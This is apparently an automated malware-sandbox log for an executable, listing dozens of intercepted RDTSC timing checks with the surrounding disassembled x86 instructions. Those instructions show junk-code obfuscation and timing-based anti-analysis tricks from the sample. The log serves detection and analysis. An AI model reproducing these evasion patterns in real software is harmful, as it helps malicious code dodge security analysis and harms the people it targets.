Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5460010 second address: 5460016 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5460016 second address: 5460027 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0CB142Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5460027 second address: 54600C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC271h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ecx, 6412CD53h 0x00000012 call 00007F17B0FBC278h 0x00000017 call 00007F17B0FBC272h 0x0000001c pop eax 0x0000001d pop edi 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007F17B0FBC271h 0x00000025 xchg eax, ebp 0x00000026 pushad 0x00000027 mov dx, cx 0x0000002a mov edx, eax 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 push edx 0x00000033 pop ecx 0x00000034 pushfd 0x00000035 jmp 00007F17B0FBC273h 0x0000003a and ch, FFFFFFAEh 0x0000003d jmp 00007F17B0FBC279h 0x00000042 popfd 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54600C5 second address: 54600E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov eax, 24AD932Fh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F17B0CB1431h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F00C9 second address: 53F00CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F00CF second address: 53F00D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F00D5 second address: 53F0117 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC278h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edx, 32D75D80h 0x00000014 call 00007F17B0FBC279h 0x00000019 pop eax 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0117 second address: 53F0128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0CB142Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0128 second address: 53F012C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F012C second address: 53F013B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F013B second address: 53F0141 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0141 second address: 53F01A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1430h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c mov edi, 57510370h 0x00000011 pop edi 0x00000012 pushfd 0x00000013 jmp 00007F17B0CB1436h 0x00000018 xor ax, 6BB8h 0x0000001d jmp 00007F17B0CB142Bh 0x00000022 popfd 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F17B0CB1435h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F021B second address: 53F0221 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410A1E second address: 5410A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410A22 second address: 5410A26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410A26 second address: 5410A2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410A2C second address: 5410A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410A32 second address: 5410A61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB142Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F17B0CB1437h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410A61 second address: 5410AAA instructions: 0x00000000 rdtsc 0x00000002 call 00007F17B0FBC278h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebx, 2391E316h 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 jmp 00007F17B0FBC26Dh 0x00000016 mov ebp, esp 0x00000018 jmp 00007F17B0FBC26Eh 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410AAA second address: 5410AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410AAF second address: 5410AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410AB5 second address: 5410AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54106B8 second address: 54106C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0FBC26Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54106C8 second address: 54106CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410550 second address: 5410556 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410556 second address: 541055C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 541055C second address: 5410560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54102D5 second address: 5410308 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1437h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F17B0CB1435h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410308 second address: 5410318 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0FBC26Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410318 second address: 541035B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F17B0CB142Eh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F17B0CB1430h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F17B0CB1437h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54200D5 second address: 54200ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0FBC274h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54200ED second address: 54200F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54200F1 second address: 5420172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a mov ch, D0h 0x0000000c pushfd 0x0000000d jmp 00007F17B0FBC26Fh 0x00000012 sub cl, 0000003Eh 0x00000015 jmp 00007F17B0FBC279h 0x0000001a popfd 0x0000001b popad 0x0000001c mov dword ptr [esp], ebp 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F17B0FBC26Ch 0x00000026 sbb esi, 4F110E38h 0x0000002c jmp 00007F17B0FBC26Bh 0x00000031 popfd 0x00000032 mov si, 7C6Fh 0x00000036 popad 0x00000037 mov ebp, esp 0x00000039 jmp 00007F17B0FBC272h 0x0000003e pop ebp 0x0000003f pushad 0x00000040 mov eax, 26DF632Dh 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420172 second address: 5420176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450EB7 second address: 5450F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F17B0FBC26Ah 0x0000000a jmp 00007F17B0FBC275h 0x0000000f popfd 0x00000010 popad 0x00000011 mov dx, ax 0x00000014 popad 0x00000015 push eax 0x00000016 jmp 00007F17B0FBC26Dh 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d mov bx, ax 0x00000020 mov cx, 971Fh 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 jmp 00007F17B0FBC272h 0x0000002c pop ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov ecx, ebx 0x00000032 mov cx, dx 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450F17 second address: 5450F1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5430314 second address: 543031C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 543031C second address: 54303F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1434h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F17B0CB142Eh 0x00000011 jmp 00007F17B0CB1435h 0x00000016 popfd 0x00000017 mov edi, ecx 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c jmp 00007F17B0CB142Ah 0x00000021 mov eax, dword ptr [ebp+08h] 0x00000024 pushad 0x00000025 mov cl, 65h 0x00000027 mov bx, E61Eh 0x0000002b popad 0x0000002c and dword ptr [eax], 00000000h 0x0000002f pushad 0x00000030 pushad 0x00000031 push edx 0x00000032 pop ecx 0x00000033 pushfd 0x00000034 jmp 00007F17B0CB1439h 0x00000039 sub ax, CC56h 0x0000003e jmp 00007F17B0CB1431h 0x00000043 popfd 0x00000044 popad 0x00000045 popad 0x00000046 and dword ptr [eax+04h], 00000000h 0x0000004a pushad 0x0000004b pushfd 0x0000004c jmp 00007F17B0CB142Ch 0x00000051 jmp 00007F17B0CB1435h 0x00000056 popfd 0x00000057 movzx esi, dx 0x0000005a popad 0x0000005b pop ebp 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f mov di, cx 0x00000062 call 00007F17B0CB1430h 0x00000067 pop eax 0x00000068 popad 0x00000069 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54104B1 second address: 54104B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54104B7 second address: 54104D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F17B0CB1434h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54104D6 second address: 54104DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420D99 second address: 5420DB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1438h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420DB5 second address: 5420DF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F17B0FBC274h 0x00000011 add cl, 00000018h 0x00000014 jmp 00007F17B0FBC26Bh 0x00000019 popfd 0x0000001a movzx eax, bx 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov bl, ch 0x00000025 mov si, di 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450670 second address: 54506F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F17B0CB1437h 0x00000008 pushfd 0x00000009 jmp 00007F17B0CB1438h 0x0000000e or cl, 00000028h 0x00000011 jmp 00007F17B0CB142Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F17B0CB1434h 0x00000022 sub al, FFFFFF88h 0x00000025 jmp 00007F17B0CB142Bh 0x0000002a popfd 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F17B0CB1436h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54506F3 second address: 545077C instructions: 0x00000000 rdtsc 0x00000002 mov ah, DCh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F17B0FBC278h 0x00000010 jmp 00007F17B0FBC275h 0x00000015 popfd 0x00000016 jmp 00007F17B0FBC270h 0x0000001b popad 0x0000001c jmp 00007F17B0FBC272h 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F17B0FBC26Eh 0x0000002a or ch, 00000008h 0x0000002d jmp 00007F17B0FBC26Bh 0x00000032 popfd 0x00000033 movzx eax, dx 0x00000036 popad 0x00000037 mov ebp, esp 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 545077C second address: 5450782 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450782 second address: 5450788 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450788 second address: 545078C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 545078C second address: 5450790 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450790 second address: 54507B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F17B0CB1439h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54507B4 second address: 54507F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC271h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c jmp 00007F17B0FBC26Eh 0x00000011 mov eax, dword ptr [76FB65FCh] 0x00000016 pushad 0x00000017 jmp 00007F17B0FBC26Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e mov dx, si 0x00000021 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54507F3 second address: 5450819 instructions: 0x00000000 rdtsc 0x00000002 mov dl, cl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 test eax, eax 0x00000009 pushad 0x0000000a mov eax, ebx 0x0000000c mov ecx, ebx 0x0000000e popad 0x0000000f je 00007F182279458Ah 0x00000015 pushad 0x00000016 movsx edi, si 0x00000019 mov si, C391h 0x0000001d popad 0x0000001e mov ecx, eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450819 second address: 545081D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 545081D second address: 5450823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450823 second address: 5450897 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F17B0FBC26Eh 0x00000009 jmp 00007F17B0FBC275h 0x0000000e popfd 0x0000000f call 00007F17B0FBC270h 0x00000014 pop ecx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xor eax, dword ptr [ebp+08h] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov eax, edx 0x00000020 pushfd 0x00000021 jmp 00007F17B0FBC26Fh 0x00000026 sbb cx, 2E3Eh 0x0000002b jmp 00007F17B0FBC279h 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450897 second address: 54508A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0CB142Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54508A7 second address: 5450921 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and ecx, 1Fh 0x0000000e pushad 0x0000000f mov bx, cx 0x00000012 call 00007F17B0FBC270h 0x00000017 mov edx, eax 0x00000019 pop esi 0x0000001a popad 0x0000001b ror eax, cl 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F17B0FBC273h 0x00000024 sbb cx, 1E5Eh 0x00000029 jmp 00007F17B0FBC279h 0x0000002e popfd 0x0000002f jmp 00007F17B0FBC270h 0x00000034 popad 0x00000035 leave 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450921 second address: 5450925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450925 second address: 5450929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450929 second address: 545092F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 545092F second address: 5450999 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC274h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d mov esi, eax 0x0000000f lea eax, dword ptr [ebp-08h] 0x00000012 xor esi, dword ptr [00CA4014h] 0x00000018 push eax 0x00000019 push eax 0x0000001a push eax 0x0000001b lea eax, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f call 00007F17B57AB460h 0x00000024 push FFFFFFFEh 0x00000026 jmp 00007F17B0FBC270h 0x0000002b pop eax 0x0000002c jmp 00007F17B0FBC270h 0x00000031 ret 0x00000032 nop 0x00000033 push eax 0x00000034 call 00007F17B57AB47Dh 0x00000039 mov edi, edi 0x0000003b jmp 00007F17B0FBC270h 0x00000040 xchg eax, ebp 0x00000041 jmp 00007F17B0FBC270h 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a push esi 0x0000004b pop edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450999 second address: 545099E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 545099E second address: 5450A1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F17B0FBC274h 0x00000011 sbb cx, CB08h 0x00000016 jmp 00007F17B0FBC26Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F17B0FBC278h 0x00000022 and ax, 6D68h 0x00000027 jmp 00007F17B0FBC26Bh 0x0000002c popfd 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F17B0FBC270h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450A1A second address: 5450A29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB142Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450A29 second address: 5450A59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F17B0FBC275h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e pushad 0x0000000f jmp 00007F17B0FBC26Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 movzx eax, bx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5400013 second address: 5400044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushfd 0x00000007 jmp 00007F17B0CB142Ch 0x0000000c sbb ecx, 6C073048h 0x00000012 jmp 00007F17B0CB142Bh 0x00000017 popfd 0x00000018 pop ecx 0x00000019 popad 0x0000001a push esp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov esi, ebx 0x00000020 movsx ebx, ax 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5400044 second address: 540004A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 540004A second address: 54000C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1431h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007F17B0CB142Eh 0x00000013 mov ebp, esp 0x00000015 jmp 00007F17B0CB1430h 0x0000001a and esp, FFFFFFF8h 0x0000001d jmp 00007F17B0CB1430h 0x00000022 xchg eax, ecx 0x00000023 pushad 0x00000024 mov esi, 65329ABDh 0x00000029 pushfd 0x0000002a jmp 00007F17B0CB142Ah 0x0000002f or esi, 65F51A98h 0x00000035 jmp 00007F17B0CB142Bh 0x0000003a popfd 0x0000003b popad 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 mov ebx, esi 0x00000042 push ecx 0x00000043 pop edi 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54000C5 second address: 54000F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 jmp 00007F17B0FBC275h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F17B0FBC26Dh 0x00000015 rdtsc
